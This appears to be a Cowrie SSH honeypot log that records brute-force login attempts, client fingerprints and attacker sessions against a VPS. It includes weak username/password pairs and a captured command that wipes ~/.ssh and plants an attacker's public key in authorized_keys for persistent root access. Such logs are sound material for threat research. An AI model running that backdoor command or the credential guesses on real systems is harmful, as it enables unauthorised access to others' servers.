{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:56.837597Z","src_ip":"212.227.125.160","session":"53df189e5d95"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:57.058837Z","src_ip":"212.227.125.160","session":"53df189e5d95"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:58.146541Z","src_ip":"212.227.125.160","session":"53df189e5d95"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":1089,"dst_ip":"1.2.3.4","dst_port":22,"session":"61e928815f23","protocol":"ssh","message":"New connection: 80.94.95.15:1089 (1.2.3.4:22) [session: 61e928815f23]","sensor":"my-vps","timestamp":"2025-08-31T01:16:00.534877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:16:00.535941Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:16:00.587109Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:01.162123Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:02.215766Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37892,"dst_ip":"1.2.3.4","dst_port":22,"session":"566435c43888","protocol":"ssh","message":"New connection: 212.227.125.160:37892 (1.2.3.4:22) [session: 566435c43888]","sensor":"my-vps","timestamp":"2025-08-31T01:16:02.242416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:02.874952Z","src_ip":"212.227.125.160","session":"566435c43888"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:16:02.945798Z","src_ip":"212.227.125.160","session":"566435c43888"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abcd123","message":"login attempt [oracle/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:03.268778Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abcd1234","message":"login attempt [oracle/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:04.322411Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.login.failed","username":"dev","password":"password1","message":"login attempt [dev/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:05.061340Z","src_ip":"212.227.125.160","session":"566435c43888"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc1234","message":"login attempt [oracle/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:05.375453Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40442,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5838b743fb6","protocol":"ssh","message":"New connection: 212.227.235.229:40442 (1.2.3.4:22) [session: a5838b743fb6]","sensor":"my-vps","timestamp":"2025-08-31T01:16:05.992583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:05.998317Z","src_ip":"212.227.235.229","session":"a5838b743fb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:16:06.237907Z","src_ip":"212.227.235.229","session":"a5838b743fb6"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:06.445011Z","src_ip":"80.94.95.15","session":"61e928815f23"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:06.500298Z","src_ip":"212.227.125.160","session":"566435c43888"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"zcadqe","message":"login attempt [postgres/zcadqe] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:07.193589Z","src_ip":"212.227.235.229","session":"a5838b743fb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47752,"dst_ip":"1.2.3.4","dst_port":22,"session":"a94b249fbb63","protocol":"ssh","message":"New connection: 212.227.125.160:47752 (1.2.3.4:22) [session: a94b249fbb63]","sensor":"my-vps","timestamp":"2025-08-31T01:16:07.261775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:07.262774Z","src_ip":"212.227.125.160","session":"a94b249fbb63"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:16:07.335969Z","src_ip":"212.227.125.160","session":"a94b249fbb63"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:07.577258Z","src_ip":"212.227.125.160","session":"a94b249fbb63"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:08.434368Z","src_ip":"212.227.235.229","session":"a5838b743fb6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:08.710705Z","src_ip":"212.227.125.160","session":"a94b249fbb63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42566,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e1d4e92cb1f","protocol":"ssh","message":"New connection: 212.227.235.229:42566 (1.2.3.4:22) [session: 0e1d4e92cb1f]","sensor":"my-vps","timestamp":"2025-08-31T01:16:13.661817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:13.662577Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:16:13.729814Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.login.success","username":"root","password":"ASDFGHJKL","message":"login attempt [root/ASDFGHJKL] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.036027Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:16:14.188851Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.189684Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.190519Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.258070Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:16:14.450919Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.451727Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.520205Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.521060Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43034,"dst_ip":"1.2.3.4","dst_port":22,"session":"50bd410dad9f","protocol":"ssh","message":"New connection: 212.227.235.229:43034 (1.2.3.4:22) [session: 50bd410dad9f]","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.584987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.585888Z","src_ip":"212.227.235.229","session":"50bd410dad9f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.652361Z","src_ip":"212.227.235.229","session":"50bd410dad9f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:14.957606Z","src_ip":"212.227.235.229","session":"50bd410dad9f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.027457Z","src_ip":"212.227.235.229","session":"50bd410dad9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43500,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e62b63acd6c","protocol":"ssh","message":"New connection: 212.227.235.229:43500 (1.2.3.4:22) [session: 5e62b63acd6c]","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.095402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.096642Z","src_ip":"212.227.235.229","session":"5e62b63acd6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.164710Z","src_ip":"212.227.235.229","session":"5e62b63acd6c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.477795Z","src_ip":"212.227.235.229","session":"5e62b63acd6c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.546591Z","src_ip":"212.227.235.229","session":"0e1d4e92cb1f"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:16.547943Z","src_ip":"212.227.235.229","session":"5e62b63acd6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52776,"dst_ip":"1.2.3.4","dst_port":22,"session":"f56ce446ac6d","protocol":"ssh","message":"New connection: 212.227.125.160:52776 (1.2.3.4:22) [session: f56ce446ac6d]","sensor":"my-vps","timestamp":"2025-08-31T01:16:17.715925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:17.716703Z","src_ip":"212.227.125.160","session":"f56ce446ac6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ec